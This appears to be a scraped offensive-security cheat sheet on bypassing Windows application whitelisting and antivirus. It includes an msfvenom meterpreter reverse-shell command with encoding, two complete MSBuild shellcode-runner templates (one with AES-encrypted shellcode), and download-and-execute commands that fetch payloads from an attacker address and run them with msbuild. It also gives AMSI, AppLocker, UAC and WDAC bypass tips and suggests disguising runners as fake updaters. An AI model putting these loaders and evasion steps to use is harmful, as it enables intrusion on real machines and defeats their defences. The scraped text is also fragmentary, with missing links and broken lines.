Writable directories in C:\Windows:
Use trusted binaries : or find via:
Copy findstr /C: "<autoElevate>true"
Then examine the library load order with procmon and look if you can write in any path where it looks for its libraries. If a path can be written to place a simple DLL there and it will be executed elevated. A nice post about this. Common target binaries:
Copy C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
COR Profile
Create a DLL payload like this reverse shell and run:
COR_PROFILER = { cf0d821e-299b-5307-a3d8-b283c03916db}
set COR_PROFILER_PATH= < pat h > /pwn.dll
Enumerate AppLocker Rules
This can be important because certain executeable names might be whitelisted!
Copy Get-AppLockerPolicy -effective -xml
Copy Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
PowerShell Constrained Language Mode (CLM)
All Powershell modules in Covenant already bypass AppLocker/CLM via its own PowerShell runspace.
Another options is: .
Also if Powershell v2 is installed we can bypass it too (because it does not support it).
AMSI loads Defender (or other AVs) into Powershell , .Net and others. A common bypass is to patch it in memory (it's being loaded as a DLL into a user process).
Process Injection
Shelter can inject shellcode into legit 32-Bit Executables and is likely to not get detected.
MSBuild Shellcode
Generate payload for msbuild in csharp output format:
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f csharp -e x86/shikata_ga_nai -i <num of iterations> > <out>.cs`
Put the buffer into the template (be sure to change payload buffer, buffer size and some strings for av evasion:
Copy <Project ToolsVersion="4.0" xmlns="">
<Target Name="Hello">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Code Type="Class" Language="cs">
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
public override bool Execute()
byte[] shellcode = new byte[195] {};
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
Download & Execute:
Copy Invoke-WebRequest "http://<ip>:<port>/<payload>.csproj" -OutFile "<outfile>.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\<outfile>.csproj
MSBuild Powershell
Use and encode PowerShell Command with'UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=d2hvYW1p . The C# part of this code is also great for embedding into fake windows gui programs (e.g. updater).
MSBuild Encrypted Shellcode
We can combine an encrypted shellcode runner with MSBuild:
Copy < Project ToolsVersion = "4.0" xmlns = "" >
< Target Name = "Hello" >
< ClassExample />
</ Target >
< UsingTask
TaskName = "ClassExample"
TaskFactory = "CodeTaskFactory"
AssemblyFile = "C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
< Task >
< Code Type = "Class" Language = "cs" >
<! [ CDATA [
using System;
using System . Runtime . InteropServices ;
using Microsoft . Build . Framework ;
using Microsoft . Build . Utilities ;
using System . Diagnostics ;
using System . IO ;
using System . Runtime . InteropServices ;
using System . Security . Cryptography ;
using System . Threading ;
public class ClassExample : Task , ITask
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAlloc (IntPtr lpAddress , uint dwSize , uint flAllocationType , uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
public override bool Execute ()
ManualResetEvent manualResetEvent = new ManualResetEvent ( false );
byte [] iv = new byte [ 16 ] { 0x30 , .. . };
byte [] key = new byte [ 32 ] { 0xe6 , .. . };
byte [] encrypted = new byte [ 512 ] { 0x68 , 0x9d , 0xc1 , .. .};
Aes encryptor = Aes . Create ();
encryptor . Mode = CipherMode . CBC ;
encryptor . KeySize = 256 ;
encryptor . BlockSize = 128 ;
encryptor . Padding = PaddingMode . Zeros ;
encryptor . Key = key;
encryptor . IV = iv;
MemoryStream memoryStream = new MemoryStream ();
ICryptoTransform aesDecryptor = encryptor . CreateDecryptor ();
CryptoStream cryptoStream = new CryptoStream (memoryStream , aesDecryptor , CryptoStreamMode . Write );
byte [] buf = null ;
cryptoStream . Write (encrypted , 0 , encrypted . Length );
cryptoStream . FlushFinalBlock ();
buf = memoryStream . ToArray ();
memoryStream . Close ();
cryptoStream . Close ();
int size = buf . Length ;
IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
Marshal . Copy (buf , 0 , addr , size);
IntPtr hThread = CreateThread ( IntPtr . Zero , 0 , addr , IntPtr . Zero , 0 , IntPtr . Zero );
manualResetEvent . WaitOne ();
return true ;
]] >
</ Code >
</ Task >
</ UsingTask >
</ Project >
To execute, curl a "run.txt" such that:
Copy iwr http://<ip>/build.xml -OutFile c:\programdata\build.xml
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\programdata\build.xml
See C# Section for how to encrypt for this variant.
Check whether WDAC is enabled with Get-ComputerInfo
(last 2 lines, "DeviceGuardCodeIntegrity"). The policies lives in C:\Windows\System32\CodeIntegrity or in the EFI System Partition, it has however no mounted drive by default:
Copy Get-Partition
Get-Partition -PartitionNumber 2 | Set-Partition -NewDriverLetter X
ls X:\EFI\Microsoft\Boot\*p7b
Copy ConvertTo-WDACCodeIntegrityPolicy -BinaryFilePath binpath - XmlFilePath xmlpath
Then Check if there are some different to the recommendation: .
LOLBas has a lot of AWL bypasses, some of these work for code integrity too.
Powershell Scripts are often "Catalog" signed (C:\windows\system32\catroot), a signed list of hashes.
Block rules for scripts are not very robust, small changes will change the hash and let the scripts run.
When we find a binary that uses powershell (and is allowed) we might be able to abuse the powershell module load order and place a malicious powershell file that gets auto loaded.
This needs a vulnerable version, Microsoft blocked a lot of versions. What we can do however is to use an old version and remove a newline in the signature if its embedded - this will stay valid signed but the hash changed, bypassing a hash based block
Device Guard